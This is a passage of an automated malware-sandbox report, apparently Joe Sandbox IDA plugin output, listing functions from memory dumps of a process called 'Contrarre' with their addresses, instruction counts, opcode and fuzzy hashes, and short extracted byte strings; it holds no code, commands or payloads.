Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6899cf9ffaaebe7cba74c097eecb1a95f181a332f66439f84be8ef4e2f58525
Instruction ID: 59000f069c64a7b37634369d9c8c54693d0b738f7fb4837302f1053e2d8ff03c
Opcode Fuzzy Hash: b6899cf9ffaaebe7cba74c097eecb1a95f181a332f66439f84be8ef4e2f58525
Instruction Fuzzy Hash: 8CE0C271D09248AFDB55DBB8944529CBFB0AB0A205F1441EAC408D7360E23A4A05CF52

Function 0B8BCA83 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c34a74fb3f6e510e686cb6d8383726b50ec0953128b27ca8b41304d34962ece
Instruction ID: 923fd777f3aee435155658e740921d71472299da379f543de4a4d956a664e5f0
Opcode Fuzzy Hash: 5c34a74fb3f6e510e686cb6d8383726b50ec0953128b27ca8b41304d34962ece
Instruction Fuzzy Hash: B7E08CB1649108DBE708CF61C0848F87BBEEB4F294720B218C06FD3669CB3041438A00

Function 0B8B2D60 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92aae14ccd59aa0177f651db2e374927bbc30cc36ed9cbc48c41d82c5c8bdb48
Instruction ID: ac86a48f6c48d5d9aaac6019c44dfacd1a74f26b9c3a946a0e603f2e5f7b7ac3
Opcode Fuzzy Hash: 92aae14ccd59aa0177f651db2e374927bbc30cc36ed9cbc48c41d82c5c8bdb48
Instruction Fuzzy Hash: 8DE09235500314CFC7108F64E845998B330FF49322B1006E9E826873E2CB328E82CF50

Function 0B8BA56F Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e45976054112eae39d4de943fa33675c17236e3a45e2309c50eff6571aa4de60
Instruction ID: b3e54ae1dd17e943851fb4e77c9fa0b394e3d923033cc6e1891aa236fdaf9508
Opcode Fuzzy Hash: e45976054112eae39d4de943fa33675c17236e3a45e2309c50eff6571aa4de60
Instruction Fuzzy Hash: 10E0C2B4D0021CEFCB55EFB8D901AAEBBF5BB48300F5086AAD854A7340D7719A91DB91

Function 0B8BA570 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eef2abf03a69bff7a06f919288c8a00a3f861eedf4bfee5686365b1eae2fbcf3
Instruction ID: 44376c3899a9aa598c251469d5f7071c163be55679cfac23ff0b7627fc2052e2
Opcode Fuzzy Hash: eef2abf03a69bff7a06f919288c8a00a3f861eedf4bfee5686365b1eae2fbcf3
Instruction Fuzzy Hash: 28E0C2B4D0021CEFCB45EFA8D901AAEBBF5BB48300F5086AAD854A7340D7719A51DB80

Function 0B8B5F29 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e290895632a169a5036eeca5fc850b8f09887277bb758ed66dfc33384075e210
Instruction ID: 8bbbd576c74185c9772f339b3c0e41395d0b2e917504243f8aed255a71c0001d
Opcode Fuzzy Hash: e290895632a169a5036eeca5fc850b8f09887277bb758ed66dfc33384075e210
Instruction Fuzzy Hash: 20E0867089D3889FC746EFB494166987FB1AF02214F1500EFC4448B273E6744E54D792

Function 0B8B8868 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6984c2532392370e01f44b2e102f551642aecf2e3ec5996f90ba9531383243a8
Instruction ID: 2b9574cda3e7f1fc0dcecb59a72f91401ea829038dc9118d25b3b2a5b7264199
Opcode Fuzzy Hash: 6984c2532392370e01f44b2e102f551642aecf2e3ec5996f90ba9531383243a8
Instruction Fuzzy Hash: 4BE09274E10208EFCB84EFA9D449A9DBBF4EB48714F0481EAD808D7361E775AA50CF81

Function 0B8B2D48 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56d5cc517bfda81a5cac3d9af78ea2dd81b030eb2d4bf12d8a6982a45b109aa6
Instruction ID: f4372bf5feafc7fb7e78e7313e56ff4f654c35fbd14cd972e687da00fe91064a
Opcode Fuzzy Hash: 56d5cc517bfda81a5cac3d9af78ea2dd81b030eb2d4bf12d8a6982a45b109aa6
Instruction Fuzzy Hash: 19E01236601304CFC315DF64E5448987B71FF85316B5004AAE51687361CB36D950CF50

Function 0B8B8638 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a38ff4beb247a3f978b669eee40a48366b7aaac4df157db0ba8057473d0ac62
Instruction ID: ea97cc87b68ab8916fa265ab991e5a91a4a215695a4bf3a0a609e51d77a607e0
Opcode Fuzzy Hash: 2a38ff4beb247a3f978b669eee40a48366b7aaac4df157db0ba8057473d0ac62
Instruction Fuzzy Hash: 17E0E270D0020DEFCB94EFB9D44579DBBF4AB49304F0085AA8808E3350E7796A54CF81

Function 0B8BA5AF Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87dc9235f68f686de9929f62c9be4fc2057ffbbc776fcb38f7697a6665c3b4ce
Instruction ID: 4341fd5dea1708d4415060f623595e2c4a3530dc63c0c88f4477e5fe5b39d6a8
Opcode Fuzzy Hash: 87dc9235f68f686de9929f62c9be4fc2057ffbbc776fcb38f7697a6665c3b4ce
Instruction Fuzzy Hash: 0CD017B5089380CFE31B9BB0A8286907F70EF07215B0902EFD08596162C6390849CF22

Function 0B8BC94C Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a4ff51e125e89e00cae2568e8ec538892481bccdbbc0fde9a6a498057a03e0c
Instruction ID: 43230d54d3538d7cee601244bada3fa90a163914992cc445d784d6bc9506ecd7
Opcode Fuzzy Hash: 7a4ff51e125e89e00cae2568e8ec538892481bccdbbc0fde9a6a498057a03e0c
Instruction Fuzzy Hash: BED042B4919244CFC7058F24E4958A9BB39EF0A605741605A94669B262C735D842CF11

Function 0B8B5F38 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c835cf024d518b7ede4a1697ab509d555a6fa9218c44c94891f04fffc011c5c
Instruction ID: 07815aa6d8211dc5787adc8eea464b5346ceeb5fb39e6bf6815d8a0012340be7
Opcode Fuzzy Hash: 4c835cf024d518b7ede4a1697ab509d555a6fa9218c44c94891f04fffc011c5c
Instruction Fuzzy Hash: 3BD0A930C0020CDFCB40FFB8A90A7AEFBF4AB00205F6001BA880893360EB706E14D781

Function 0B8BA5C0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1aeba9bf0f959b676b45a0014ced46f1c8ddea181ebeb0818a44daed70eae93
Instruction ID: 3a1a7f56ab262be19fc39ee825f23bbd8a98b607d33e093eb4dc78f18aab69cb
Opcode Fuzzy Hash: f1aeba9bf0f959b676b45a0014ced46f1c8ddea181ebeb0818a44daed70eae93
Instruction Fuzzy Hash: 87C08CF1000308CBE6146BE1F40CB6476B8AB09206F000165E149820628E704490DE52

Function 0B8BE493 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 759705580d5a4d8a47c01a9d9a89a11cb7ba08a4b22f7ba4d9443561e1f08a4b
Instruction ID: a12f9513d4ea41cf95ab9b04f7347454a9360a6118cda42fec606810a3121015
Opcode Fuzzy Hash: 759705580d5a4d8a47c01a9d9a89a11cb7ba08a4b22f7ba4d9443561e1f08a4b
Instruction Fuzzy Hash: 1ED012B0900209CFE704CF66C248ADE7BF1EF44206F54862AD011A3310D7784C4ACF16

Function 0B8BE73C Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e823705b8ad396dcd4a1cb1b8c4d220d2c47e7d6ac169fc45bffe43f8df995f8
Instruction ID: 63f507e3ed7dd3d8603d9b9780761d94488bba84bcbdad810d18a34635c807e5
Opcode Fuzzy Hash: e823705b8ad396dcd4a1cb1b8c4d220d2c47e7d6ac169fc45bffe43f8df995f8
Instruction Fuzzy Hash: C2C08CB094420A8FC704DB6AC1449DC3BF9FB44706B0089358011D7728EA34CC82CF19

Function 0B8B0F54 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ffca6b2947e082ac02d1c52400c38c3cc2fe6db7dcfd9992616108fa777513d
Instruction ID: 0b045d49667ddd9483f5eb0577ecff8a6b7de385082cebbd4d802383194f2887
Opcode Fuzzy Hash: 5ffca6b2947e082ac02d1c52400c38c3cc2fe6db7dcfd9992616108fa777513d
Instruction Fuzzy Hash: 10B0122E6D8340E7A50937B44881D5BA794AFF6B05B40FC127215932A084314C65E22F

Function 0B8BAE96 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c98114cdc5a8ce48e412e0f79832907880736ee771b7481ab67c483f3ed103a1
Instruction ID: 4e5011d41192c43480da82766cd5962da56b810e942c85d94ff10a985b1ebc87
Opcode Fuzzy Hash: c98114cdc5a8ce48e412e0f79832907880736ee771b7481ab67c483f3ed103a1
Instruction Fuzzy Hash: B4C0CA70902219CBEB90CB24E880F9877B4EB08201F0086A5D00A93221CE301EC8CF05

Function 0B8BC2FF Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ce990d646d3c51059380a1864c97c81ea1a507f186de3409e994e18535e3f6b
Instruction ID: a679c6140133878960f7523ab9aebd06ed5a07e329f98da2f108514700a4c5dc
Opcode Fuzzy Hash: 8ce990d646d3c51059380a1864c97c81ea1a507f186de3409e994e18535e3f6b
Instruction Fuzzy Hash: FEC02B63818148CBDF404B30DC815CE3F24FF09304F4484C3D007A3153E13549524E03

Non-executed Functions

Function 0B8B6928 Relevance: 6.5, Strings: 5, Instructions: 282COMMON

Download Yara Rule

Strings

H4ux, xrefs: 0B8B69E9
nay, xrefs: 0B8B6BFE
H4ux, xrefs: 0B8B69E2
nay, xrefs: 0B8B6BF4
H4ux, xrefs: 0B8B6A00

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: H4ux$H4ux$H4ux$nay$nay
API String ID: 0-1200253175
Opcode ID: aa3967b14b3484a0078942111ede6c55a372ab784df0f6ba16cb28c0d79525fb
Instruction ID: 58294998dec2e4885eb1f82b3025706a8ac12677c9a362de76eda169a38ed606
Opcode Fuzzy Hash: aa3967b14b3484a0078942111ede6c55a372ab784df0f6ba16cb28c0d79525fb
Instruction Fuzzy Hash: 9BC11974E15219DFDB14CFA9D980AAEFBB2FF88300F24916AD419AB365DB309941CF50

Function 0B8B3D70 Relevance: 5.2, Strings: 4, Instructions: 174COMMON

Download Yara Rule

Strings

tQ=), xrefs: 0B8B3E0D
tQ=), xrefs: 0B8B3E06
%O@8, xrefs: 0B8B3EDA
%O@8, xrefs: 0B8B3ECC

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: %O@8$%O@8$tQ=)$tQ=)
API String ID: 0-749352435
Opcode ID: 8833617e34d452d69c0db41e2fc1007b647db6e2da685462a91f8c5f8509b0ed
Instruction ID: 7586df7d3a1ef2195aa88f213651d175c05905ccb08f6cf4924ed9df3c434eb9
Opcode Fuzzy Hash: 8833617e34d452d69c0db41e2fc1007b647db6e2da685462a91f8c5f8509b0ed
Instruction Fuzzy Hash: 3E71DEB4E112099FCB48CFA9D58499EFBF1FF88250B14956AE425EB324D730AA41CF54

Function 0B8B4920 Relevance: 5.2, Strings: 4, Instructions: 162COMMON

Download Yara Rule

Strings

aY, xrefs: 0B8B4B11
18', xrefs: 0B8B4A6A
18', xrefs: 0B8B4A5C
aY, xrefs: 0B8B4B0A

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: 18'$18'$aY$aY
API String ID: 0-3687307736
Opcode ID: d1d8d589e7432ccac6c68ac971cfde0a6d1f7c321810dbc4d971eed14cd1479c
Instruction ID: ee169aa0581f9af0dd0bcca6bc701415700e826c6f87d96b12f515f15f9fdecd
Opcode Fuzzy Hash: d1d8d589e7432ccac6c68ac971cfde0a6d1f7c321810dbc4d971eed14cd1479c
Instruction Fuzzy Hash: 2E71D4B4D0520ADFCB04CFA9C5829EEFBB1BF89310F189519D525A7325D334A942CF95

Function 0B8B6918 Relevance: 4.0, Strings: 3, Instructions: 269COMMON

Download Yara Rule

Strings

H4ux, xrefs: 0B8B69E9
H4ux, xrefs: 0B8B69E2
H4ux, xrefs: 0B8B6A00

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: H4ux$H4ux$H4ux
API String ID: 0-2732375326
Opcode ID: 6f87271176cb4de17492b4977e9bb26d0ce1b97a710a9d16a73ab0ffdde03088
Instruction ID: 9b15d635430eb8873ec46b0ec8eaf0ffa5d3f39429a51cb56c9062828a67b030
Opcode Fuzzy Hash: 6f87271176cb4de17492b4977e9bb26d0ce1b97a710a9d16a73ab0ffdde03088
Instruction Fuzzy Hash: 46C10870E15219DFDB14CFA9C980AAEFBB2FF89300F2491AAD419AB365D7309941CF51

Function 0B8B3D61 Relevance: 3.9, Strings: 3, Instructions: 174COMMON

Download Yara Rule

Strings

tQ=), xrefs: 0B8B3E0D
tQ=), xrefs: 0B8B3E06
%O@8, xrefs: 0B8B3EDA

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: %O@8$tQ=)$tQ=)
API String ID: 0-2920369752
Opcode ID: da8e11ef2eae3bafaaf95fb7fb0fe5bf601b7ddb20cfd2eb19b8b341ecd61424
Instruction ID: 9f293d5888082aaa85262d49da5cb27ff8963faa403b42770c6ac35d73ffca14
Opcode Fuzzy Hash: da8e11ef2eae3bafaaf95fb7fb0fe5bf601b7ddb20cfd2eb19b8b341ecd61424
Instruction Fuzzy Hash: A171EE74E152099FCB48CFA9D48499EFBF1FF89310B18856AE425EB324D730AA45CF54

Function 0B8B3E4C Relevance: 3.9, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

tQ=), xrefs: 0B8B3E0D
tQ=), xrefs: 0B8B3E06
%O@8, xrefs: 0B8B3EDA

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: %O@8$tQ=)$tQ=)
API String ID: 0-2920369752
Opcode ID: 6c00b18862d27d811ed7efc08a82280a26406656f8963b9849530021807f50b3
Instruction ID: b9e02cd56fd2980a26365eae169e6bb109fc876546f0408db06ebb353d84a73e
Opcode Fuzzy Hash: 6c00b18862d27d811ed7efc08a82280a26406656f8963b9849530021807f50b3
Instruction Fuzzy Hash: BB51FFB4E1520ADFCB44CFA9D48499EFBF1FF88250B18995AE425EB324D730AA41CF54

Function 0B8B3968 Relevance: 3.9, Strings: 3, Instructions: 130COMMON

Download Yara Rule

Strings

p{i!, xrefs: 0B8B3A11
p{i!, xrefs: 0B8B3A0A
p{i!, xrefs: 0B8B3A28

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: p{i!$p{i!$p{i!
API String ID: 0-4269626222
Opcode ID: 0a132fd1ae35980a51669845499145ea82d58598411d8a05caf102f87a302ae9
Instruction ID: ffe9cf4a33c517364a17939ae1dc3573a3a4227ffc26441780f1f77acde99510
Opcode Fuzzy Hash: 0a132fd1ae35980a51669845499145ea82d58598411d8a05caf102f87a302ae9
Instruction Fuzzy Hash: 5A512A74E0520AEFCB04CFA5C5809AEFBB2FB85300F14956AC425E7324D3749A45CF9A

Function 0B8B5439 Relevance: 3.9, Strings: 3, Instructions: 117COMMON

Download Yara Rule

Strings

,uRR, xrefs: 0B8B5520
6yu[, xrefs: 0B8B5597
6yu[, xrefs: 0B8B559E

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: ,uRR$6yu[$6yu[
API String ID: 0-86511755
Opcode ID: 9e19bcb86030c0e319ed352b466bc64f02fb8f13a823c1d25a4ee86773debeaf
Instruction ID: dc568e7a12454353481e4fe09c1ef49e1909da00f078754aa2937d865f8261f2
Opcode Fuzzy Hash: 9e19bcb86030c0e319ed352b466bc64f02fb8f13a823c1d25a4ee86773debeaf
Instruction Fuzzy Hash: C441F2B4E0564A9FDB08CFA9C5819EEFBF2AB89300F24946AC414E7364D3349A418F95

Function 0B8B5448 Relevance: 3.9, Strings: 3, Instructions: 114COMMON

Download Yara Rule

Strings

,uRR, xrefs: 0B8B5520
6yu[, xrefs: 0B8B5597
6yu[, xrefs: 0B8B559E

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: ,uRR$6yu[$6yu[
API String ID: 0-86511755
Opcode ID: d14be944368dd773919abe9414edc2f71530583f821003caf9d19920fd3b0af4
Instruction ID: 86a5d9bfc781d54aec0ad17796d379a850c79dc7441e29a761fd8adeec78a6d1
Opcode Fuzzy Hash: d14be944368dd773919abe9414edc2f71530583f821003caf9d19920fd3b0af4
Instruction Fuzzy Hash: D441E4B4E0560ADFDB08CFA9C5819EEFBB2AB88301F64D46AC414B7364D3749A418F95

Function 0B8B7F88 Relevance: 2.8, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

9u"K, xrefs: 0B8B8033
Zjsq, xrefs: 0B8B8036

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: 9u"K$Zjsq
API String ID: 0-1261923490
Opcode ID: fe289cc75a077f17b96b3404f5af53943ac1e33b2f955aefbd3206bd88d65329
Instruction ID: 393915215a4e7b54405c00516947f16879e4e306ab9814cbfe5c093430340d2e
Opcode Fuzzy Hash: fe289cc75a077f17b96b3404f5af53943ac1e33b2f955aefbd3206bd88d65329
Instruction Fuzzy Hash: CDC1B170E0521ADBCB18CFAAD58099EFBF6BF89380F14952AD415EB328D7349942CF54

Function 0B8B7F87 Relevance: 2.8, Strings: 2, Instructions: 290COMMON

Download Yara Rule

Strings

9u"K, xrefs: 0B8B8033
Zjsq, xrefs: 0B8B8036

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: 9u"K$Zjsq
API String ID: 0-1261923490
Opcode ID: d1092928b303af1d7c9a5af7c9d5a43d04fcd3296e67834d2e9303fa0a720f70
Instruction ID: 3f1dd63aea873b314fbe5a6d1d9d91d41171a07a025be539dee9f51d4f2ab03e
Opcode Fuzzy Hash: d1092928b303af1d7c9a5af7c9d5a43d04fcd3296e67834d2e9303fa0a720f70
Instruction Fuzzy Hash: CBC1C170E0521ADBCB18CFAAD58099EFBF6BF88380F14952AD415EB328D7349942CF50

Function 0B8B6010 Relevance: 2.7, Strings: 2, Instructions: 170COMMON

Download Yara Rule

Strings

or, xrefs: 0B8B6076
\~$, xrefs: 0B8B6140

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: \~$$or
API String ID: 0-2796768027
Opcode ID: 2fdf894d470df4e851d925beb5bda742f0f8ed821b118dc744ae5c96953135ea
Instruction ID: 233574884a814747f3201b6a96ff3af0ad95d65651d44d0ff8045586c1f5cd39
Opcode Fuzzy Hash: 2fdf894d470df4e851d925beb5bda742f0f8ed821b118dc744ae5c96953135ea
Instruction Fuzzy Hash: 436118B4E152099FCB04CFA6D5419EEFBF2AF88310F14942AD416F7364E6389A46CF50

Function 0B8B4910 Relevance: 2.7, Strings: 2, Instructions: 167COMMON

Download Yara Rule

Strings

aY, xrefs: 0B8B4B11
18', xrefs: 0B8B4A6A

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: 18'$aY
API String ID: 0-535677718
Opcode ID: e0d93ded9922235db888868874852b11bb692d8425f1f7132b465c8d83e4b5d8
Instruction ID: 02d78f7583695367db49aebebafcc4f34a54f3862ca79d8b747f7f68b41782df
Opcode Fuzzy Hash: e0d93ded9922235db888868874852b11bb692d8425f1f7132b465c8d83e4b5d8
Instruction Fuzzy Hash: 7A61E374E0520A8FCB04CFA9C5829EEFBB2BF89300F189516D565EB325D734A942CF95

Function 0B8B6020 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

or, xrefs: 0B8B6076
\~$, xrefs: 0B8B6140

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: \~$$or
API String ID: 0-2796768027
Opcode ID: ede7aaa7bbabc3e53ccc11c66c91ef71e02dcea379c13c137ff522c258207e19
Instruction ID: c8ec426c6ec40fe65b96146cab6cf25bbbce7fe4f8751ad05d04769959d71d2b
Opcode Fuzzy Hash: ede7aaa7bbabc3e53ccc11c66c91ef71e02dcea379c13c137ff522c258207e19
Instruction Fuzzy Hash: C261F9B4E1520ADBCB14CFA6D581AEEFBF2AF88350F10942AD416F7364E7345A428F50

Function 01855A58 Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

O K+, xrefs: 01855B0E
O K+, xrefs: 01855B07

Memory Dump Source

Source File: 00000000.00000002.1385986696.0000000001850000.00000040.00000800.00020000.00000000.sdmp, Offset: 01850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1850000_Contrarre.jbxd

Similarity

API ID:
String ID: O K+$O K+
API String ID: 0-1165592217
Opcode ID: 97840b2b7cd332c03eeca8d0635586b80848b60bc28ee0b76f7f366c42e5360f
Instruction ID: be352e0e9375d4681c876709c8b160dbc7a949ab757bb6a037d587d80c3f78ac
Opcode Fuzzy Hash: 97840b2b7cd332c03eeca8d0635586b80848b60bc28ee0b76f7f366c42e5360f
Instruction Fuzzy Hash: 4F41D2B0E0520ADBDB48CFAAC5805AEFBF2FB88350F24C56AC915B7214D7349A41CF95

Function 0B8B7988 Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

?w=>, xrefs: 0B8B7C64

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: ?w=>
API String ID: 0-1933253675
Opcode ID: 53bbfb18873a5ece355ec24b24006967ee180857a70a8e0860fafc95fdc4f630
Instruction ID: 65c5bcd873b952436f19dd0d0cb3f61c112e5564834cf0cf7b1fb86e04dfd81a
